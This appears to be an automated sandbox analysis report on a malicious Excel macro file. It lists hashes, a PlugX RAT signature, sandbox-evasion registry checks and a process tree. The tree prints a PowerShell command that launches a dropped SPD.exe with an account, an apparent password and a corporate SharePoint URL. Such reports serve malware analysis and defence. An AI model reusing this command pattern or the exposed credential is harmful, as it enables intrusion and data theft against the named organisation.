Analysis
-
max time kernel
137s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
29-03-2022 23:26
Static task
static1
Behavioral task
behavioral1
Sample
6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm
Resource
win7-20220310-en
General
-
Target
6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm
-
Size
1.6MB
-
MD5
d9c0d4a7bbb8ec67b195daa158f04f5f
-
SHA1
ffcfeca98f3aeb343bba753cd3d84f1770b7665e
-
SHA256
6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9
-
SHA512
421f6ddda2c26ba8434cde9a9c8337b8dc88c3d8be378b0f56d1f9bb8ef3e675e3f4b2a8a03f5f6df6dd2b039a0beed1791a1e8c5c35adb7c926b433d597f228
Malware Config
Signatures
-
PlugX Rat Payload 1 IoCs
resource yara_rule behavioral2/memory/60-145-0x000002A7728D0000-0x000002A773660000-memory.dmp PlugX -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3312 60 powershell.exe 80 -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4028 60 DW20.EXE 80 -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dwwin.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwwin.exe -
Modifies registry class 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 EXCEL.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\{7B87D630-D489-4F7D-BD00-E59AE91CFAD6}\SPD.exe:Zone.Identifier EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 60 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 60 EXCEL.EXE 3312 powershell.exe 3312 powershell.exe 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 60 EXCEL.EXE Token: SeDebugPrivilege 3312 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 60 EXCEL.EXE 60 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE 60 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 60 wrote to memory of 2888 60 EXCEL.EXE 85 PID 60 wrote to memory of 2888 60 EXCEL.EXE 85 PID 60 wrote to memory of 3312 60 EXCEL.EXE 93 PID 60 wrote to memory of 3312 60 EXCEL.EXE 93 PID 60 wrote to memory of 4028 60 EXCEL.EXE 95 PID 60 wrote to memory of 4028 60 EXCEL.EXE 95 PID 4028 wrote to memory of 784 4028 DW20.EXE 96 PID 4028 wrote to memory of 784 4028 DW20.EXE 96
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6e4513d1bc45644004b84e3a4bfc027b428bea3484ceaaa7489778fa9f7a88c9.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "& ($env:TEMP + \"\SPD.exe\") \"[email protected]\" \"Nhh2H5urwHv0\" \"https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/\" \"Produktark MPF Kopi.xlsx\""2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3312
-
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 62922⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\dwwin.exeC:\Windows\system32\dwwin.exe -x -s 62923⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:784
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:2236